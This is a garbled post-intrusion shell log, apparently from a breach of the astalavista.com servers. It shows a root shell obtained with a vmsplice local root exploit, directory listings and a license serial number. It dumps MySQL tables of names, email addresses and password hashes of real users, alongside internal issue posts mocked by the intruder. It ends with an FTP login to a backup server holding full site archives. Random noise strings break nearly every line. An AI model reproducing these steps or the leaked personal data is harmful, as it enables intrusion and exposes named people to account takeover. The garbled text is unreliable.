-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout$ | U& ~* o) q3 x4 A. h
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile6 z$ c) V& `- }/ n( S: g& ~4 V4 }8 [) b
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc3 R5 b b0 J n
drwx–x–x 3 com com 4096 Jan 29 2008 domains
2 P; u) E$ [. r" i& ^-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
( h9 f- X& U6 N5 W! W* [9 `drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
4 x5 z7 Y9 r$ y4 s, `3 ]' ?6 C" i-rw——- 1 com com 69 Nov 18 2008 .lesshst6 z9 b' C: _7 X! O
drwx—— 2 com com 4096 Sep 24 2007 mail
9 v, }% U0 { j& _& \& Q' e9 K-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history% q8 s4 h. p, s# h
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp- e" z) ?1 b2 ]% B ^: @
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
+ i/ e. y, A8 x# F& e! U-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
0 u+ W0 e5 n* h! q0 Z1 E5 A$ tdrwx—— 2 com com 4096 Aug 26 2008 .ssh
7 F3 f* `8 k5 W. z3 A, V, c( g-rwx—— 1 com com 8515 Feb 10 2008 t
& b+ k0 c8 d: v( c' @+ E-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c9 V! R# L: ?. L O9 Y {1 ~( a5 f \
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp, m) t: e- q8 g5 }6 n8 f. O
-rw-rw-r– 1 com com 617 May 20 2008 .toprc& n$ l0 M" a" G( ?* _2 l2 D. x
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql" ~ s/ j1 g$ h4 J
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo, ^* N/ ~+ G& q+ I V$ g0 S6 Z
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc8 e, Z, K. P# }* A- F
5 o3 K5 q' P/ @5 t+ i
sh-3.2# head t.c1 h9 E# L2 n. H1 O
/*2 K5 ^2 A) }8 R# n- q4 e, s$ b
* jessica_biel_naked_in_my_bed.c
2 T6 J. I. m$ c3 D*9 D0 x$ k; M' l1 F* |: b/ G
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.. f; a l, D3 m5 I" g* d* S! s; U
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.% g- q1 |7 x' z' c
* Stejnak je to stare jak cyp a aj jakesyk rozbite., f9 f: U2 l! B7 S% N' r- e3 c
*
6 ]6 ^, H$ _: y* t u7 O( G6 {* Linux vmsplice Local Root Exploit: }# s7 ]4 g2 @/ `, i
* By qaaz$ o9 @" y, t3 I# g
*( d* ^, n6 i3 }) o! L! |. M
H3 D% N& [5 s7 psh-3.2# cd /
2 \6 {; S9 J9 R6 `5 F" xsh-3.2# ls -la
8 i: Y) w6 |$ E9 G7 V! z$ dtotal 360
7 ]1 d, x9 v9 F7 xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
- d9 g# W4 X9 ^& l$ Kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, \' y, P N- Q' [' u1 ?-rw——- 1 root root 10240 Jun 3 02:39 aquota.group4 ^0 R0 U( t* Y1 X8 |/ \+ H( h
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user( n+ ^9 R: l7 }6 S( D0 i
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
9 w6 O) D3 H$ h* i& _-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
" L0 K: q1 T$ M7 [-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel. p6 F# n( i6 `; s" d
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup2 \" A" c! G% H# w5 S
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin8 U8 i2 ^/ f, F# q. X/ ?* j# [: {
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
2 f6 h( r0 L- V( G/ N- f9 q, {drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev+ P4 a" j5 ?9 x7 E$ I0 J6 X
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
7 }% Q) {' l; ~" }, g/ a* ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
4 C, i% j/ ? T. N' z* |9 Q ?$ K-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf, O$ \6 {/ w9 X Q0 F! F
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
`. Z/ ^6 J4 x( J- N. v' Q( P Jdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64% ?+ j$ r) `' [- Q8 }+ y8 I
drwx—— 2 root root 16384 Sep 11 2007 lost+found
+ ]1 n! b5 P3 m' A- ~( edrwxr-xr-x 2 root root 4096 Mar 11 17:56 media* G) W8 s/ f& }# m
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc" d6 i0 |4 E% A
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
5 O |7 ~( J8 ^) n-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
6 ~) z3 C! R5 P3 I, k9 Cdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
; P/ X- y2 p; m& z. e4 P; |, D8 ydrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt( l+ ]! x: y6 L) W7 ], `
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc. k6 E/ d8 n$ g! I7 G
drwxr-x— 15 root root 4096 Jun 4 08:40 root
4 M+ s4 L% n+ n8 F, a4 B7 Jdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
+ p ]; Z% z" n) bdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux6 e ?, \6 M: B0 |2 z' u7 E
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
8 ^; _4 x7 c6 C# a; Pdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
4 \7 R3 @# t3 O# u, a$ l) o) idrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp) d; T, T) L0 j, h( r0 ]
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
, t# d# f4 ?1 y( n" P5 Hdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 o I# r; ^; | Y
/ ?* `: t; @# zsh-3.2# cd opt
: _% K8 I3 e9 x7 o( h# f* Rsh-3.2# ls -la8 C: m( X. j9 x2 e
total 20) T5 ~# x& }3 N9 G% u8 D; ^
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ./ t, b. T/ Z+ V. d z" `
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ../ ~4 y- l) n5 J+ [
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws3 n. Q0 V; X; m
0 e: N$ k( U( H( {
sh-3.2# cd lsws/5 H4 S( W, n# v+ D) i9 ^9 S. m
sh-3.2# ls -la& E' H! U9 y$ U7 y; F
total 108
1 ?1 R! |1 Q5 Q$ o7 ddrwxr-xr-x 15 root root 4096 Mar 20 2008 .7 M4 C+ Z ?6 c& t0 b N
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..: K6 M6 P3 r3 l! H2 [
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
6 [7 ?. h0 N5 X, Ydrwxr-xr-x 13 root root 4096 May 29 15:10 admin
* I0 d- a. K- i4 W' `6 }3 Ndrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate, v+ S( m6 d2 l" E) [% u' s, i
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
+ k+ S! W a; Y8 Bdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
# @, Q* L P. |$ {3 _drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
. o9 L. l! w: c/ A4 Bdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
* D& ~2 G0 [' bdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin) j! s. V' i2 Z$ Y1 v
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
8 ~4 L. r' B5 T-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE3 L2 A) ?! C& P+ f- @& _ Y
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
+ M& J2 E! p2 N# U' c* o-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
) V: h3 h7 v, ]8 w0 ~& a$ q. j8 d-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
y+ |6 p" }2 V# Kdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
# N% ^: C/ D0 d& edrwxr-xr-x 2 root root 4096 Mar 20 2008 php4 H$ |/ k r N. [; p$ |# {! R) h
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
, \# r6 ]; Y" l" S- Z1 T' m, Rdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
6 e- G2 J% ?6 K( @/ z1 P-rw-r–r– 1 root root 6 May 29 15:10 VERSION) u. j' A! p) l% X0 S7 k
, }# y; f# E, E$ q$ f3 ?2 ]. jsh-3.2# cd conf
# A; U9 X/ r& H5 ]* `sh-3.2# ls -la& q. `% K2 H4 m- p
total 48" b& M; ~5 i8 `" t; y4 d. Q
drwx—— 4 apache apache 4096 Jun 3 02:43 ." I" \/ o# {. a/ e
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..6 e4 j+ p6 k% c5 Z# }2 a2 ]( s9 M
drwx—— 2 apache apache 4096 Mar 20 2008 cert
3 m( ]7 W: V9 ]$ F. @, K-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
) i9 `: b: _% v. ?4 |0 Q; c-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak9 \. {$ P6 H3 W
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last& _/ ?/ A9 t, _+ N& b) Z, Q
-rw——- 1 apache apache 256 May 29 15:10 license.key
; e2 z( c3 R# G-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
4 B$ U5 A* f# d% s- l% J$ z2 a-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
* `) P( }' w3 |-rw——- 1 apache apache 20 May 29 15:10 serial.no
A: F0 y5 d. c/ f: g% _drwx—— 2 apache apache 4096 Mar 20 2008 templates
3 R& ^% ~3 n2 j) P: J7 P M( w1 y/ g6 @" k4 w( x
sh-3.2# cat serial.no
/ p5 T- ?/ {9 R) ]! d& kIbDl-oVsO-CKqL-wVRa
. y/ m$ |+ e- H7 e+ @ E+ O0 K
" j! X+ r5 s+ n$ y) ksh-3.2# mysql
8 [* c {0 @+ _& I7 \& |3 y' [Welcome to the MySQL monitor. Commands end with ; or \g.
+ W! {# F; |1 y' pYour MySQL connection id is 286844- U0 S H* Q- n$ l( F7 h z& u' z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)* \6 T- J E7 c8 _
7 ~) l; S; ^' y1 i4 d# U+ f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., ~) F* i }: n$ w! i
5 d$ ?) {8 _; Umysql> show databases;
* o! }% m9 d% ~( k+ J# R+———————–+- F! x* f8 x! S- ?
| Database |# k8 L1 D7 _4 X% q* k1 t( e+ h! J
+———————–+, H1 r5 f( b) O' C4 n, p, e8 v
| information_schema |9 B# {" ^8 ~1 O3 f4 j
| astanet_ads |
' ]( ~. e! P$ p* L4 q" f| astanet_mailing_lists |# Z: _( D( x7 w' W0 |6 k
| astanet_mediawiki |% {( E) g4 F+ Z- \( j. b
| astanet_membersystem |! G! f- `) q( T. l7 P
| com_contrexx |4 |4 l9 H3 f; w- K. f; e5 n% i
| com_contrexx2 |- T- ?1 Z D, B
| com_contrexx2_live |. p, s5 c K/ J
| da_roundcube |
3 ^4 E3 R2 s2 l3 o| dolphin |: u9 S! s+ ?+ D' u' s
| ideapool |3 ~: v; B9 }3 `& ~0 @4 q3 J) A
| mysql |
# K: s6 }" h1 @+ q& U# r8 e0 B/ r6 y| test |
0 w) t/ y* m# g0 f! G4 [| yourmaster |
5 s# j. u5 r( W. x" w+———————–+
3 w4 m O9 k0 K# h! O# b14 rows in set (0.00 sec)6 W' H+ r+ h" b4 K, L: D7 [- ^8 w; ~
4 s0 r% Q3 k2 }$ l1 L
mysql> use ideapool3 Q7 [1 F$ |, c- o9 ^
Database changed
/ p7 K P2 t: b$ o6 m1 xmysql> show tables;
" b+ c+ P/ X7 H& X- r; v+———————————–+
1 b6 M+ h$ _( M| Tables_in_ideapool |
7 z Y- E/ |. C) E6 E! ?: F. x+———————————–+
% r, Z3 v& P9 u| eventum_columns_to_display |6 B' A( D- F" V" B: M6 J8 f
| eventum_custom_field |
2 c- T2 V3 d" s+ y| eventum_custom_field_option | J; X, G& l( Y# q* H/ x
| eventum_custom_filter |- B- y0 L7 H! J. |0 B; [; d
| eventum_customer_account_manager |
+ C2 R& w0 m( {/ f. }' X| eventum_customer_note |
% ?3 T/ V- Q- ~) Q# \" c3 Z3 q| eventum_email_account |: [. z: y( {* V% K" G, c& T* R% K6 G
| eventum_email_draft |7 m1 Z8 ]6 ]" m+ q
| eventum_email_draft_recipient |
- p2 a3 `' M% N- }3 h$ H| eventum_email_response |
: V- j% F( e* v$ N8 g* ^& U| eventum_faq |
9 V N, ?6 c3 | E| eventum_faq_support_level |
+ r7 p/ u& M5 w9 S# `2 e| eventum_group |
* B0 j( l2 L% o| eventum_history_type |+ z( \4 H& v' T% ^6 M1 d
| eventum_irc_notice |7 I A8 z& s) }! _0 [
| eventum_issue |) j, p6 D- p& d, H. k/ o+ f/ [* v
| eventum_issue_association |
; \5 m, a5 [. k/ V9 c| eventum_issue_attachment |
! S" p* H# e( Y- I7 ` n! @# I5 R$ z| eventum_issue_attachment_file |
5 }' J4 {1 D5 c' T; ]/ [| eventum_issue_checkin |# Y* I- A5 B: K h( c: U
| eventum_issue_custom_field |
1 ^9 P2 c9 ?: N6 x: m; t5 j| eventum_issue_history |; C8 U; [: _3 F( W" w* q
| eventum_issue_quarantine |/ k8 x5 Z. p9 ^2 O. n% v
| eventum_issue_requirement |& G7 d4 [' B. t7 u |. S6 V$ I
| eventum_issue_user |
: K& v$ U) r% X5 G( `0 x0 `| eventum_issue_user_replier |; X9 p8 J7 o) y! P$ |: J; l
| eventum_link_filter |
# } U1 _! ]$ Y& {% @| eventum_mail_queue |
0 A( u$ N$ }9 ?% A: H3 ^, z| eventum_mail_queue_log |
, q5 D) Q1 i, X8 Q| eventum_news |6 n- E7 K+ ?/ I$ E! i- q3 W5 q# E
| eventum_note |
! C# d3 |5 u( c: T4 Q$ x% R6 f* v| eventum_phone_support |
6 \$ m$ y* l' ?# P9 h| eventum_project |' d' K4 F K! y+ @
| eventum_project_category |8 c. D8 L/ W2 K3 j; V' H0 _& \
| eventum_project_custom_field |0 b e# v5 ~& m4 z. G! n
| eventum_project_email_response |1 t; f$ I6 }9 D# `- J( c
| eventum_project_field_display |
4 f- |$ J) z# u| eventum_project_group |
* A E. |3 |! [! ~5 N| eventum_project_link_filter |
2 W$ [; P4 e* H| eventum_project_news |1 d& T% X* v6 c, o# P& n3 ]
| eventum_project_phone_category |8 V( |; C% ^' P- w
| eventum_project_priority |1 N1 y6 P% B. Y8 y3 E( D
| eventum_project_release |
/ s) F5 T0 k# P! |/ o| eventum_project_round_robin |( j9 n3 z9 J: Y- p `
| eventum_project_status |
/ D1 i5 o k2 L| eventum_project_status_date |
% n( l, m5 H: z) L| eventum_project_user |( e9 |( }# a' D e% j
| eventum_reminder_action |
! H1 b+ I6 V0 {| eventum_reminder_action_list |6 R& |* b8 K4 o0 H3 _
| eventum_reminder_action_type |
& J! a5 h7 i/ |+ o. t| eventum_reminder_field |# V- a' ~/ F$ C3 h" e- q" z
| eventum_reminder_history |& h: h3 o7 n/ }0 m# t+ R( y' o
| eventum_reminder_level |
1 w, z4 D# Y7 ?( p) @3 t; I| eventum_reminder_level_condition |- f" r/ {' u6 h2 y) L# \
| eventum_reminder_operator |
* X+ m5 g/ t) P: ]| eventum_reminder_priority |
$ v4 s+ Y3 B% f1 {/ q| eventum_reminder_requirement |
|- g* t: l3 z1 X# H| eventum_reminder_triggered_action |" A- r3 d' n' i
| eventum_resolution |
2 K3 A G4 ]6 m" h| eventum_round_robin_user |
' P) L6 ]# I0 W2 }0 Z' Q9 Z5 N| eventum_search_profile |
5 P9 y7 x% G; u% }| eventum_status |
5 c# [, N: i" Y; m( U; |5 K| eventum_subscription | {9 j+ z8 L' p1 B- J+ l7 o7 F
| eventum_subscription_type |7 i" [5 S9 v$ ~$ `
| eventum_support_email |
0 k! ?+ L: q" E% I! T$ p| eventum_support_email_body |. V, \; n/ P1 b8 O
| eventum_time_tracking | @! b' R: a, c* E6 _
| eventum_time_tracking_category |( \: n; T$ a! J+ M, m
| eventum_user |& g# x" I' U# Y
+———————————–+3 f3 j4 M+ T. K/ z. m: B7 s: r A
69 rows in set (0.00 sec)1 E* s- G/ @. B* C: X0 {
+ o Y# x7 s. Y" B
mysql> describe eventum_user;& D/ k# }$ d! e; }+ Z
+————————-+——————+——+—–+———————+—————-+4 Z% K; F8 c% h
| Field | Type | Null | Key | Default | Extra |
% N+ |) e/ M7 ^7 |' ~0 l+————————-+——————+——+—–+———————+—————-+
! _& V( @- {& a| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
, Q, |# k9 a7 {# i' L| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
9 \* ~% V, C* V( B| usr_customer_id | int(11) unsigned | YES | | NULL | |* g! u+ k9 n* q
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
" C$ ]9 G0 V; h. T9 _% s+ w| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |- ?# `! {4 l/ m
| usr_status | varchar(8) | NO | | active | |6 s# @2 B8 P r+ M( h( j" U
| usr_password | varchar(32) | NO | | | |1 u! ^ @) D( b# Q6 u+ c# U) f; g, F
| usr_full_name | varchar(255) | NO | | | |
, m! c! [2 O& m( L3 A| usr_email | varchar(255) | NO | UNI | | |7 \! O1 J- L" T/ T5 R. z
| usr_preferences | longtext | YES | | NULL | |
% z* O/ ^; ]& Q/ M# k| usr_sms_email | varchar(255) | YES | | NULL | |
$ Q' {3 v `; [1 G. C8 h| usr_clocked_in | tinyint(1) | YES | | 0 | |
" Q3 ~) p# o$ E; c) t& t7 x| usr_lang | varchar(5) | YES | | NULL | |# x) i3 ?7 H6 Q* u: q1 r
+————————-+——————+——+—–+———————+—————-+% `3 s/ m' g6 \. `% W9 i
13 rows in set (0.00 sec)2 C2 m( Q3 _6 M5 ~3 y
+ U1 X% h- j0 N& Y5 Pmysql> select usr_full_name,usr_email,usr_password from eventum_user;4 L2 O3 Q4 [6 h. j( O r5 y; y
+———————-+——————————-+———————————-+, v; X6 Z0 O o e: w+ _; O
| usr_full_name | usr_email | usr_password |6 h8 A; L$ ?8 d k! e! a' G! Z
+———————-+——————————-+———————————-+
; q3 [& F3 Q. \) d! H| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |& o1 B; N! |1 N8 P# ?
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |# c( B. P, m X; [& \6 j
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
" H; ]& V" F( v| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |1 a }3 ]# c7 f! x
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |. `2 ^' z. b+ P
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
$ J/ ?# Q; p' G8 M2 d3 [3 [2 e# a| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |3 F. b7 h0 @" ~! g; K
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
, }) F9 @) L1 L! k| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
* ~4 q; F4 [$ N/ E6 ?4 J! x| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
/ f# d: I* ?$ A9 u* S9 _. N4 t| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |5 U" \) F+ Z) c$ y" _+ Y
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |* x7 o0 }! N* P6 Y0 i* b: Z
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
+ Q* |& f. j: f. @| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |% ]1 r: {3 r! a: V P
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
' `& w% R3 V, g+———————-+——————————-+———————————-+% @' Q( Q8 [' r& O+ T! G
15 rows in set (0.00 sec)5 o. O5 g" B5 G+ B# W- y8 b
0 o) g5 o9 }0 F* x; _2 bmysql> select iss_description from eventum_issue where iss_id = 43;/ n- p6 I; u( y3 L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+( L( j. }& @8 L4 B3 Z6 Z9 s9 d
| iss_description
* g/ F) _; j, O/ }: S5 p|* S1 m, V ~7 o' ~# K9 @3 m# K _
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 T9 l7 I" h) z. I| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be) V9 L1 f- s1 n8 I; B
connected for 90 mins… 120mins… so what i propose is something like:
. A* O8 y, t2 r链接标记[url]http://www.surfthechannel.com/[/url]9 P( w( b7 F2 b5 z
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
5 i* W& u3 x1 w: T* `like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t6 L" T+ C7 O5 T6 u* N5 v
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
" K4 @+ m1 ]5 U: Y, i0 s6 q; Bif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…! M& T6 S9 W9 l
& v" x0 Q& e7 S/ s/ Y/ xWe could also put advertisement during play on the flash video player itself… extra $$…
{- V; P0 m! f; W& z5 t+ e1 B4 b! \. s/ L$ i1 D# N
By sykadul |
- B6 q/ L, U1 j+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" y" l0 a) R# h! M1 row in set (0.00 sec)
; H: m$ c1 o2 |1 a9 x6 M
8 s9 Y8 ]1 K! k$ F# j7 h" j3 V// Money and extra $$ is all they care about. remember that.
) T; Y/ N4 I7 ~/ H3 T
E" e" K9 ^" h! s" F5 W0 Rmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;+ _+ t9 J* Q s+ F( ?$ h; X6 K( } \
+————————+——————————————————————————————————————————————————————————————————————————————-+/ B; ~* b. g6 v4 q6 u) c w9 t" ^
| iss_summary | iss_description - j# t/ X5 @: ^6 X) b& J o
|' X) r& v1 K2 m9 C
+————————+——————————————————————————————————————————————————————————————————————————————-+
2 t- K: ~6 y1 C- G| Forum for REAL EXPERTS | Hello," B. x5 m0 H# o2 Y- u9 D5 _
- p7 ?" X1 D cIshtus and I,
* Q0 R% m& c" k s- E: G
' s" B- {7 G6 C* kCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
* a @5 g9 H6 NONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
3 N9 b0 E! y' y5 I1 e* {9 e7 K
- `3 F$ d$ K/ i: E1 kOne example a friend of mine from coresecurity.com!
2 @& v8 n6 I2 i+ n+ w, H
1 R9 R4 w$ f0 k4 I5 \% sWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 F$ S3 W$ X8 y1 y* N* D4 T6 G0 o
( D. e+ D# f, A: @3 q
| v# X( D8 y1 T( A+ e3 F/ B4 |/ R
+————————+——————————————————————————————————————————————————————————————————————————————+% a. ?( H( V% E: [2 P
1 row in set (0.00 sec)2 i; L4 R( ~3 s! n! y
3 d/ M4 \: W* n, W# y- {// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs… _- v7 F9 Z8 `7 o- Q
" B0 o3 X, Z. j& vmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;* ^1 h! G% [2 B4 O
+——————+———————————————————————————————+
% l* b( n% D. i| iss_summary | iss_description |: J& s( }' U4 f/ Y
+——————+———————————————————————————————+
8 i7 ?8 R+ H3 Q; P* J/ r5 }4 w| Website guidance | Virtual Girl which guides you trought the website.# u) l! K9 D9 q7 R0 U
; r: s: h/ c. V/ t) Q
We need a girl with who you can ( talk )!!!
) h$ b& Y9 g* c, `+ EAlso for the News!7 ~; A1 q6 B" @9 Q6 z& h8 F
So my suggestion is a girl who read you the news loud if you like!
. n \3 @+ f8 tyou can choose between read yourselfe or she read it for you or both!7 a% M# K$ Z# p2 N3 K" v2 k
+ i% X8 D6 w# \1 j6 [) F9 z
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 z# |3 O4 }% O
$ S& C' H3 h2 n. ~# L' h# EHave a look on the example girls!!$ ^) _: Y, E y& h1 x$ [
/ e3 J. l7 v7 V9 O3 A
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
5 N9 L1 B/ N: u5 X4 `* Q; \
1 z( \7 C1 X) h; |" ror that
& z+ T, |+ h4 S; @3 p( K: k- B. U) j8 C+ b
链接标记[url]http://www.yellostrom.de/[/url]+ o; e V8 _, K2 k4 s9 N1 H( C
! y+ R' p7 k- Z5 H) |+ e* \/ ]|
( i* Q2 N3 t: c! Q( f& }2 ~$ I+——————+———————————————————————————————+, [8 z6 W: J$ y+ z0 b5 D
1 row in set (0.00 sec)
* r" K: }* h; d1 G8 G5 |8 n* \8 w" y& r% |2 V9 m5 t% H
// ha ha.
) e7 f) ]# m" M# _8 q" @, L
, n/ M) ?( h* M0 B5 f9 X( p5 cmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7; H8 ]; E! ~% B0 l) |+ o, M
+————————–+———————————————————————————————————–+8 m/ d- g, B$ J/ q- f9 I) i y+ P
| iss_summary | iss_description |
; X" |7 Y! A2 R' y" _+————————–+———————————————————————————————————–+
6 D" X: Z1 ~5 O- B: T| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
. i; q+ X+ j/ s6 |( ]+————————–+———————————————————————————————————–+
9 h" W% p% m* U, y* u# S% m F" y* X1 row in set (0.00 sec)2 ^2 }8 s2 i$ @& d+ T1 X
& R8 S3 J4 s! V0 Q7 b3 i
// LOL.
- E8 F9 u9 i4 [& a
# C! e4 M) A8 Vmysql> exit( V5 L N/ T4 d# Q
Bye
9 H( K: a* v ?0 T3 z1 v3 K- d' ]+ L' R% m/ {
sh-3.2# ftp 212.254.194.163
; `4 v! k3 o, Q9 ]+ S# S7 RConnected to 212.254.194.163.5 |; J2 ` {# J* R9 l
220 BackupCOM_VW FTP server ready.* f' L! [) ]5 T! H4 V! Z- J
504 AUTH: security mechanism ‘GSSAPI’ not supported.8 C1 k$ U- s; E9 D3 H: z% N0 P
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
& A5 |# a7 i. [% |" @KERBEROS_V4 rejected as an authentication type1 ^* ~# S; C7 a" `8 a* |
Name (212.254.194.163:root): astalavista.com5 y2 `% x6 B# k
331 Password required for astalavista.com.4 H) w" c. m$ A% `: U, y( B
Password:: f5 d7 U `2 E% {
230 User astalavista.com logged in.
# a0 M1 _2 W% j5 w5 F& q& bRemote system type is UNIX./ c. T4 x1 F; }- J& K# p9 X3 D
Using binary mode to transfer files.
* C* H7 T2 C* m, s; m# `! _( ^ftp> ls -la
) D5 A6 e* a+ P* B# o8 _227 Entering Passive Mode (212,254,194,163,2,188)3 M" K) X* ~, B* D. e- u5 G) Q4 e
150 Opening BINARY mode data connection for ‘file list’.9 K# e C- D7 c Z! G
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
) ~, [1 \1 U# H* A2 d226 Transfer complete.
# X/ W0 p! f1 W3 `$ Z; ^* @ftp> cd astalavista.com
8 C3 ~1 u0 ~6 B4 T+ Q250 CWD command successful./ F0 Q+ L: z" ]0 n! e
ftp> ls -la
_& ^6 ]1 O& O5 k* e5 R227 Entering Passive Mode (212,254,194,163,2,189)' }+ z- P# V9 D) {+ n
150 Opening BINARY mode data connection for ‘file list’.
# L7 _: v" X W) Q-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar' N$ A* R* i$ p/ `
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
+ T' r4 S$ D) M6 H-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz27 j+ ?2 X5 ^! {
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar- B4 B \6 F* l% R
